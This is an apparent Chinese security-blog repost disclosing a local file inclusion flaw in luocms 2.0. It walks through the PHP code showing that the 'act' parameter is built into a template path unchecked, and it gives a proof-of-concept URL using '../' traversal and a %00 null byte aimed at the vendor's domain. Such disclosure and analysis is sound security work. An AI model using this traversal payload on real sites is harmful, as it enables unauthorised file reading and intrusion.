/*******************************************************//* luocms 2.0 Local File Inclusion Vulnerability/* ======================== /* E-Mail : 681796@qq.com/*========================/*******************************************************//* Welcome to http://www.90sec.com *//*******************************************************///首先看看首页&luocms 2.0本地文件包含_记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华黑客技术" />
记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

luocms 2.0本地文件包含

2013-05-24 15:11
有点鸡肋
 
php;">
/*******************************************************/

/* luocms 2.0 Local File Inclusion Vulnerability

/* ========================

/* E-Mail : 681796@qq.com

/*========================

/*******************************************************/

/* Welcome to http://www.90sec.com */

/*******************************************************/


//首先看看首页
<?PHP
require_once "inc/const.php";

$id = getvar("id"); //查看函数 getvar
$fid = getvar("fid");
$cid = getvar("cid");
$act = getvar("act");
$p = getvar("p");
$p = !empty($p) ? $p : 1;

$p_l = new cls_tpl();
$p_l->tpl_main($act,$id,$cid,$sitepath,$p);

?>


//跟入tpl_main 函数
function tpl_main($act,$id,$cid,$sitepath,$p){
//$stime=microtime(true); //获取程序开始执行的时间
$tpl_addr = $this->get_tpl($act);
$temp = $this->load_tpl($tpl_addr);
$temp = $this->get_include_file($temp);//包含产生
$temp = $this->get_sys_tag($temp,$id,$cid);
$temp = $this->get_list_tag($temp,$id,$cid,$p);
$temp = $this->get_url_path($temp);
$temp = $this->get_sort_tag($temp,$id,$cid);
$temp = $this->get_title_tag($temp,$id);
$temp = $this->get_sitepath($temp,$act,$id,$cid);
if ($id != ""){
$temp = $this->get_content_content($temp,$id);
$temp = $this->get_prv_next($temp,$id);
}
echo $temp;
//$etime=microtime(true);//获取程序执行结束的时间
//$total=$etime-$stime; //计算差值
//echo "<br />$total times";
}

//跟入get_tpl函数
function get_tpl($act){
if ($act != "") {
$temp = $GLOBALS[templatedir].$act.$GLOBALS[rewriteext];
}else{
$temp = $GLOBALS[templatedir].$GLOBALS[indextemplate];
}
return $temp;
}
//$GLOBALS[templatedir].$act.$GLOBALS[rewriteext]; 看看赋值

$installdir = "";
$templatedir = 'template/';
$databasePrefix = "luo_";
$indexname = "LUOCMS首页";
$indextemplate = 'index.html';
$httpurl = "http://127.0.0.1/lUOCMS_UTF8_V2.0.101201/upload/";
$defaultext = 'html';
$sitepathsplit = ' > ';
$titlepathsplit = ' - ';
$rewriteext = '.html';
$author = "Admin";
$source = "本站";
$site_beian = "123456";
$manager_email = "admin@luocms.com";
$sysversion = "V2.0.101108_UTF8";
$issetup = "0";

//ok template/$act.html $act 可控 产生包含

 

 
poc: http://www.luocms.com/index.php?act=../upload/file/3.txt%00 
 
修复方案:
 
过滤 
 


知识来源: www.2cto.com/Article/201305/214040.html

阅读:89710 | 评论:0 | 标签:cms

想收藏或者和大家分享这篇好文章→复制链接地址

“luocms 2.0本地文件包含”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云